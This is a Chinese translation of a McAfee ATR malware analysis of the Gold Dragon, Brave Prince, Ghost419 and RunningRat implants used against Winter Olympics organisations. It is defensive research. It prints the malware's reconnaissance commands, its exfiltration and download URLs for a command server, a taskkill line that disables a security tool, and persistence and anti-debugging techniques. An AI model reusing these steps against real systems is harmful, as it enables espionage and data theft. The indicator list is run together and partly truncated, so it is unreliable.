Gold Dragon:針對冬奧會的惡意軟體
一、前言
McAfee ATR(Advanced Threat Research,高級威脅研究)團隊最近發布了一份報告,介紹了針對平昌冬奧會相關組織的無文件攻擊活動。攻擊者使用了PowerShell植入體,連接到攻擊者的伺服器,收集基本的系統信息。當時我們並沒有確認攻擊者獲得受害者系統的訪問許可權後具體執行了什麼操作。
McAfee ATR現在又發現了攻擊者使用的其他植入體(implant),這些植入體的功能是實現本地持久化,進一步竊取數據、拓展目標訪問方式。根據代碼中出現的特徵,我們分別將2017年12月份出現的這些植入體命名為Gold Dragon(黃金龍)、Brave Prince(勇敢王子)、Ghost419以及Running Rat(奔跑碩鼠)。
2017年12月24日,我們的分析人員發現了使用韓語的植入體:Gold Dragon。2018年1月6日,ATR發現了針對奧運會的攻擊活動,現在我們可以肯定,這個植入體是此次攻擊活動中所使用的第二階段載荷。在奧運會攻擊活動中使用的PowerShell植入體是基於PowerShell Empire框架的一個stager攻擊載荷,可以創建一個加密通道,連接至攻擊者的伺服器。然而,這款植入體需要其他模塊的配合,才能形成完整的後門。此外,除了使用簡單的計劃任務外,PowerShell植入體並不具備其他本地持久化機制。與最初的PowerShell植入體相比,Gold Dragon具備更強大的本地持久化機制,使攻擊者能夠在目標系統上完成更多任務。在攻擊者攻擊冬奧會的同一天,我們觀察到了Gold Dragon重新活躍的蹤影。
Gold Dragon惡意軟體的功能更加豐富,可以收集目標系統信息,並將結果發送給控制伺服器。PowerShell植入體只具備基本的數據收集能力,如用戶名、域名、主機名以及網路配置信息,這些信息可以用來識別攻擊者感興趣的目標,針對這些目標發動更為複雜的惡意軟體攻擊。
二、Gold Dragon
Gold Dragon是一款數據收集植入體,最早於12月24日出現在公眾視野中。攻擊者在樣本中硬編碼了一個域名:www.golddragon.com,這個域名在樣本中多次出現,這也是我們將其命名為Gold Dragon的原因所在。
在整個惡意軟體感染及載荷攻擊鏈條中,該樣本充當的是二次偵察工具以及下載器角色,為後續的攻擊載荷服務。除了從控制伺服器下載以及執行程序之外,Gold Dragon還可以生成密鑰,用來加密從系統中收集到的數據。前面那個域名並沒有在控制過程中使用,加密數據會發往另一個伺服器:ink.inkboom.co.kr,2017年5月份出現的植入體也曾用過這個域名。
我們從2017年5月份起就已經跟蹤到Ghost419以及Brave Prince,與這些植入體相比,Gold Dragon也包含相同的元素、代碼以及相似的行為。我們發現Gold Dragon變種(創建時間為12月24日)曾下載過一個DLL植入體(創建時間為12月21日)。這個變種的創建時間比釣魚郵件攻擊活動要早3天,作為釣魚郵件的第二個文檔發送給333個受害組織。12月24日的Gold Dragon變種使用的控制伺服器為nid-help-pchange.atwebpages.com,而12月21日的Brave Prince變種也用到了這個域名。
2017年7月,Gold Dragon的第一個變種在韓國首次出現。最開始時Gold Dragon的文件名為????.exe,直譯過來就是Hangul Extraction(韓文提取),該樣本只在韓國出現。在針對奧運會相關組織的攻擊活動中,我們頻繁看到5個Gold Dragon變種的身影(這些變種的創建時間為12月24日)。
三、分析Gold Dragon
在啟動時,Gold Dragon會執行如下操作:
1、動態載入多個庫中的多個API,構建導入函數;
2、為自身進程獲取調試許可權(」SeDebugPrivilege「),以便遠程讀取其他進程的內存數據。
惡意軟體並沒有為自身創建本地持久化機制,但會為系統上的另一個組件(如果該組件存在)設置本地持久化:
1、惡意軟體首先會查找系統上是否正在運行Hangul word processor(HWP,HWP是類似於微軟Word的一款韓國文檔處理程序)。
2、如果HWP.exe正在運行,惡意軟體會解析傳遞給HWP.exe的命令行參數中的文件路徑,獲取HWP當前打開的文件。
3、將該文件(文件名通常為*.hwp)拷貝至臨時目錄中:C:DOCUME~1<username>LOCALS~1Temp2.hwp。
4、將hwp文件載入到HWP.exe中。
5、惡意軟體讀取2.hwp的內容,通過特徵字元串「JOYBERTM」查找文件中的」MZ魔術標誌「。
6、出現這個標誌則代表.hwp文件中存在經過加密的MZ標誌,惡意軟體可以解密這段數據,將其寫入用戶的啟動目錄中:C:Documents and Settings<username>Start MenuProgramsStartupviso.exe。
7、這樣就能實現本地持久化,在主機重啟後運行惡意軟體。
8、成功將載荷寫入啟動目錄後,惡意軟體就會刪除主機上的2.hwp。
惡意軟體之所以這麼做,原因可能有以下幾點:
1、在主機上實現本地持久化;
2、為主機上的其他組件實現本地持久化。
3、當另一個獨立的更新組件從控制伺服器上下載更新後,可以在主機上更新為最新版惡意軟體。
這款惡意軟體的二次偵察功能及數據收集功能仍然有限,並不是完整版的間諜軟體。攻擊者從主機上收集的所有信息首先會存放在某個文件中(C:DOCUME~1<username>APPLIC~1MICROS~1HNC1.hwp),經過加密後發送給控制伺服器。
惡意軟體會從主機上手機如下信息,存放在1.hwp文件中,然後發送給控制伺服器:
1、使用命令列出用戶桌面上的目錄:
cmd.exe /c dir C:DOCUME~1<username>Desktop >> C:DOCUME~1<username>APPLIC~1MICROS~1HNC1.hwp
2、使用命令列出用戶最近訪問的文件:
cmd.exe /c dir C:DOCUME~1<username>Recent >> C:DOCUME~1<username>APPLIC~1MICROS~1HNC1.hwp
3、使用命令列出系統%programfiles%文件夾中的目錄:
cmd.exe /c dir C:PROGRA~1 >> C:DOCUME~1<username>APPLIC~1MICROS~1HNC1.hwp
4、使用命令收集主機的系統信息:
cmd.exe /c systeminfo >> C:DOCUME~1<username>APPLIC~1MICROS~1HNC1.hwp
5、將ixe000.bin文件從C:Documents and Settings<username>Application DataMicrosoftWindowsUserProfilesixe000.bin拷貝至C:DOCUME~1<username>APPLIC~1MICROS~1HNC1.hwp。
6、收集當前用戶註冊表中的Run鍵值信息。
HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRunNumber of subkeys(<KeyIndex>) <KeyName>Number of Values under each key including the parent Run key(<ValueIndex>) <Value_Name> <Value_Content>
帶有註冊表信息以及系統信息的1.hwp如下所示:
Gold Dragon會在信息竊取過程中執行如下步驟:
1、一旦惡意軟體從主機上收集到了所需的數據,則會使用www[dot]GoldDragon[dot]com這個密碼來加密1.hwp文件。
2、加密後的數據寫入1.hwp文件中。
3、在信息竊取過程中,惡意軟體會使用base64演算法編碼經過加密的數據,然後使用HTTP POST請求將結果發送給控制伺服器,所使用的URL地址為:http://ink[dot]inkboom.co.kr/host/img/jpg/post.php。
4、在請求過程中使用的HTTP數據及參數包含如下內容:
Content-Type: multipart/form-data; boundary=—-WebKitFormBoundar ywhpFxMBe19cSjFnG <followed by base64 encoded & encrypted system info>User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)Accept-Language: en-usHTTP Version: HTTP/1.0
此外,惡意軟體也會下載並執行控制伺服器為其提供的其他組件。控制伺服器會根據惡意軟體提供的主機名以及用戶名返回其他組件,惡意軟體將主機名及用戶名嵌入HTTP GET請求中,如下所示:
GET http://ink[dot]inkboom.co.kr/host/img/jpg/download.php?filename=<Computer_Name>_<username>&continue=dnsadmin
從控制伺服器那成功獲取組件後,惡意軟體會將下一階段拷貝至當前用戶的Application Data目錄,再加以執行:
C:DOCUME~1<username>APPLIC~1MICROS~1HNChupdate.ex
備註:的確是ex文件,並非exe文件
惡意軟體會檢查與反惡意軟體產品有關的進程來規避惡意行為:
1、檢查是否存在帶有」v3「以及」cleaner「關鍵字的任何進程。
2、如果發現這類進程,則向這些進程的窗口線程發送WM_CLOSE消息,終止這些進程。
四、分析Brave Prince
Brave Prince是一款韓語植入體,代碼以及行為與Gold Dragon變種類似,特別是系統信息竊取過程以及控制伺服器通信機制方面更加相似。該惡意軟體會收集受害者配置信息、硬碟內容、註冊表、計劃任務、正在運行的進程等等詳細信息。研究人員最早於2017年12月13日發現Brave Prince,當時這款惡意軟體會通過韓國的Daum郵件服務將收集到的信息發送給攻擊者。與Gold Dragon相同的是,後來的變種則會將信息通過HTTP POST方式發送給Web伺服器。
Brave Prince的Daum變種會將收集到的信息保存到PI_00.dat文件中。該文件會以附件形式發給攻擊者的郵箱地址。後來的變種則會將文件通過HTTP POST命令上傳至Web伺服器。該植入體會從受害者系統中收集如下類型數據:
1、目錄及文件;
2、網路配置信息;
3、地址解析協議的緩存信息;
4、通過系統配置收集任務信息。
Brave Prince的這兩個變種都可以殺掉Daum工具所對應的某個進程(該進程可以阻止惡意代碼,這是韓國獨有的一款工具)
taskkill /f /im daumcleaner.exe
5、後來的Brave Prince變種中還會硬編碼如下字元串:
c:utilsc2ae_uiproxy.exec:userssalesappdatalocaltempdwrrypm.dl
五、分析Ghost419
Ghost419是一款韓語植入體,最早於2017年12月18日出現,最近的變種則在針對奧運會的釣魚郵件活動的前兩天集中出現。這款惡意軟體會向控制伺服器發送硬編碼的字元串及URL參數,我們可以根據這些特徵來識別這款軟體。Ghost419最早可以追溯到於2017年7月29日創建的某個樣本,該樣本似乎是一個非常早期的版本(沒有硬編碼這些特徵)。7月份的變種與12月份的變種大約共享46%的代碼。早期版本的植入體會創建一個特殊的互斥量(kjie23948_34238958_KJ238742),12月份的變種中也包含這個特徵,但其中有一位數字不同。Ghost419基於Gold Dragon以及Brave Prince開發而成,包含一些共享元素及代碼(特別是系統二次偵察函數方面更加相似)。
上傳過程中用到的WebKitFormBoundarywhpFxMBe19cSjFnG字元串同樣也出現在2017年12月份的Gold Dragon變種中。
Gold Dragon樣本如下:
Ghost419樣本如下:
其他方法中還有許多類似之處,在通信機制方面,該樣本使用的user agent字元串與Gold Dragon相同。
Gold Dragon的user agent字元串如下:
Ghost419的user agent字元串如下:
六、分析RunningRat
RunningRat是一款遠程訪問木馬(RAT),需要兩個DLL搭配使用。我們根據惡意軟體中硬編碼的字元串將其取名為RunningRat。在釋放到目標系統中時,第一個DLL會被執行。該DLL包含3個主要功能:結束反惡意軟體進程、解封裝並執行主RAT DLL以及建立本地持久化機制。惡意軟體會釋放出Windows批處理文件dx.bat,該批處理文件會嘗試結束daumcleaner.exe進程(一款韓國安全程序),然後再嘗試執行自刪除操作。
第一個DLL會使用zlib壓縮演算法從自身文件中提取出一個資源文件。惡意軟體作者在程序中保留了調試字元串,因此我們很容易就能識別出其中用到的演算法。第二個DLL會在內存中解壓縮,永遠不會觸及用戶的文件系統,該文件也是主RAT執行的文件。最後,第一個DLL會在SoftWareMicrosoftWindowsCurrentVersionRun這個註冊表路徑中添加SysRat鍵值,確保系統啟動時會運行惡意軟體。
當第二個DLL載入內存後,第一個DLL會覆蓋其中控制伺服器對應的IP地址,這樣就能有效地修改惡意軟體需要連接的伺服器地址。第二個DLL中硬編碼的地址為200.200.200.13,被第一個DLL修改後會變為223.194.70.136。
這種行為可能代表攻擊者會復用這段代碼,或者這段代碼可能為某個惡意軟體攻擊包中的一部分。
第一個DLL用到了常見的一種反調試技術(檢查SeDebugPrivilege):
第二個DLL一旦執行,則會收集受害者系統的配置信息,如操作系統版本、驅動器以及進程信息。
隨後,惡意軟體開始記錄下用戶的鍵盤敲擊行為,使用標準的Windows網路API將這些信息發送給控制伺服器,這也是該惡意軟體的主要功能。
根據我們的分析結果,竊取用戶擊鍵數據是RunningRat的主要功能,然而該DLL中也包含其他功能代碼。這些代碼包括拷貝剪貼板、刪除文件、壓縮文件、清除事件日誌、關閉主機等等。然而,就目前而言,我們並沒有發現滿足執行這些代碼的條件。
McAfee ATR分析人員會繼續研究RunningRat,以確認攻擊者是否使用了這些代碼,或者這些代碼只是大型RAT工具包中的遺留代碼而已。
第二個DLL使用了一些反調試技術,其中包括自定義的異常處理程序以及會產生異常的代碼路徑。
此外,代碼中還包含一些隨機的空白嵌套線程,以此延緩研究人員的靜態分析進度。
最後一種反調試技術與GetTickCount性能計數器有關,攻擊者將該函數放在主要代碼區域中,以檢查惡意軟體運行時,是否存在調試器導致延遲出現。
七、總結
在McAfee ATR團隊發現的釣魚郵件攻擊活動中,攻擊者會使用圖像隱寫技術來傳播PowerShell腳本(即第一階段植入體)。如果大家想進一步了解隱寫術,可以參考McAfee實驗室發表的威脅報告(第33頁)。
一旦PowerShell植入體被成功執行,本文介紹的植入體會在受害者系統上建立本地持久化機制。一旦攻擊者通過無文件惡意軟體突破目標系統,則會將這些植入體作為第二階段攻擊載荷加以傳播。這些植入體中,部分植入體會判斷系統中是否運行Hangul Word(韓國專用的文檔處理軟體),只有該軟體正在運行時才會建立本地持久化機制。
發現這些植入體後,現在我們對攻擊者的活動範圍也掌握得更加全面。Gold Dragon、Brave Prince、Ghost419以及RunningRat的出現表明攻擊者的攻擊活動比我們原先了解的更加猖獗。通過持續性的數據竊取,攻擊者可以在奧運會期間獲得潛在的優勢。
感謝Charles Crawford以及Asheer Malhotra在惡意軟體分析過程中提供的幫助。
八、IoC
IP
194.70.136
域名
000webhostapp.com000webhostapp.com000webhostapp.comnid-help-pchange.atwebpages.cominkboom.co.krbyethost7.com
哈希值
fef671c13039df24e1606d5fdc65c92fbc1578d906948ab527ae415f32ed4b0f0d70be4a86b364a596a2fda8f26018724c86b275fe9396e24b26ec9ead08a60dc511d9b69e584c1310dbd6039acffa0dc2f01355880cd9dfeef75cff189f4a8af421e0d3615447f458463dc77f7ae3b0a4ad20ca2303027abf21667e4b48b8857020ba455531c9c4f2560740bc6cb78e20cb20285149d55563f6fdcf4aaafa58465d48ae849bbd6505263f3323e818ccb501ba88a9eb9a1734bb84bbc60df38d4a1e02a870962857539acd9145befd7e670fe826c248766f46f0d041d63c7d7305a8b2184fff3b0941e596f09287aa6635e5310b6183469f4995b7cd4f795da8459087a411a38a9d23193d9582d02ab0eae767c3933066ece68f43ecb03330ff0420047b61933583b414458583706ddaa5ea5ee2cfff54b7c809458a39163a7a3a0c617d17e7f819775e48f7edefe9af84a1446b761b0690cd86fb472738b6dc32661ace5cf188937e74f034d8aa4570bd1b7dcfcdfaa52c9a1393615e1326dd7122e2e2aed04ca4de180d16686853a76e13875449beb00884e07a38d0dd2a73afe382834f58e6a7a04be2b2ecbcdcbae6f281778fdbd9f9389db34c3a37fd288e92463302629aa48be06e3571f337dc65459027f4ab26198270368f68d7ae775a7fdfa88addb88680c2f0d5f7095220b4bbffc1
推薦閱讀:
TAG:惡意軟體 |